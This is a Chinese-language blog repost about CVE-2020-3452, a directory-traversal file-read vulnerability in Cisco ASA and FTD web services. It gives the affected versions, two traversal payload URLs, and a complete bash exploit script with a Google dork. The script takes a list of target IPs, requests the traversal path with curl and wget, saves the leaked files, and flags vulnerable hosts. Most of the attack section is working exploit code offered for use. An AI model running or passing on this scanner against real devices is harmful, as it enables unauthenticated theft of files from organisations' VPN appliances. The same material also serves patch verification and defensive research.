（CVE-2020-3452）Cisco ASAFTD 任意文件读取漏洞

2022年1月6日00:42:29评论156 views字数 3233阅读10分46秒阅读模式

一、漏洞简介

Cisco Adaptive Security Appliance (ASA) 和 Cisco Firepower Threat Defense (FTD) 的 web 服务接口存在漏洞，允许未经身份验证的远程攻击者向受影响的设备发送一个精心制作的HTTP请求，成功利用该漏洞的攻击者能够进行目录遍历攻击并读取目标系统上的敏感文件。

该漏洞目前仅影响启用了AnyConnect或WebVPN配置的设备，并且此漏洞不能用于访问ASA或FTD系统文件或底层操作系统(OS)文件。

二、漏洞影响

Cisco ASA：<= 9.6
Cisco ASA：9.7 , 9.8 , 9.9 , 9.10 , 9.12 , 9.13 , 9.14
Cisco FTD：6.2.2 , 6.2.3 , 6.3.0 , 6.4.0 , 6.5.0 , 6.6.0

三、复现过程

payload 1

/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

payload 2

/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua

poc

# Exploit Title: Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion
# Google Dork: inurl:/+CSCOE+/
# Date: 2020-08-27
# Exploit Author:  0xmmnbassel
# Vendor Homepage: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
# Version: Cisco ASA Software  >=9.14 except 9.11   Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60
# Vulnerability Type: unauthenticated file read
# CVE: CVE-2020-3452


#!/bin/bash


read="%2bCSCOE%2b/portal_inc.lua"


helpFunction()
{
   echo ""
   echo -e "\t\tCVE-2020-3452"
   echo ""
   echo "Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua "
   echo -e "\t-l for list of IPs in text file"
   echo -e "\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua"
   echo -e "\t-i for single IP test"
   exit 1
}

while getopts "l:r:i:" opt
do
   case "$opt" in
      l ) input="$OPTARG" ;;
      r ) read="$OPTARG" ;;
      i ) website="$OPTARG" ;;
      ? ) helpFunction ;;
   esac
done



#if $website is empty or $input is empty
if [  -z "$website"  ] && [ -z "$input" ]
then
   echo "Some/all of the parameters are empty";
   helpFunction
fi

#usage


if [ -z "$website"];
  then
  while IFS= read -r line
  do
    name=$(echo $line | cut -c9-19)
    #echo "testing $line"
    filename="$name.txt"
      #echo $response
      status=$(curl -LI  $line"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name="$read  -o /dev/null   -w '%{http_code}\n' -s)

      if [ $status -eq "400" ]; then
        echo "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!"
      else
        wget  "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read" -O $name.txt

        if [ -s $filename ]; then
          echo "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read..."
            echo "downloaded!, $line is vulnerable to CVE-2020-3452."

        else
          echo "not vulnerable!"
          rm -rf $filename
        fi
      fi
    done < "$input"
  else

  name=$(echo $website | cut -c9-16)
  filename="$name.txt"

  status=$(curl -LI  $website"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name="$read  -o /dev/null   -w '%{http_code}\n' -s)
  if [ $status -eq "Bad Request" ]; then
    echo "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!"
  else

    echo "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read..."
    wget  "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read" -O $name.txt
    if [ -s $filename ]; then
      echo "downloaded!, $website is vulnerable to CVE-2020-3452."
    else
      echo "not vulnerable!"
      rm -rf $filename
    fi
  fi

fi

FROM :ol4three.com | Author:ol4three

左青龙
微信扫一扫

右白虎
微信扫一扫

（CVE-2020-3452）Cisco ASAFTD 任意文件读取漏洞

一、漏洞简介

二、漏洞影响

三、复现过程

php Thread实例

获取wdigest明文密码加密传输至远程服务器

dump lsass进程

CVE-2020-0688 powershell版

CVE-2020-0601 伪造签名笔记

从零开始学windows API

查看注册表键值修改时间

c++ 修改注册表键值

keylogger

使用 R820T2 电视棒收听 FM 广播

发表评论

在线咨询

微信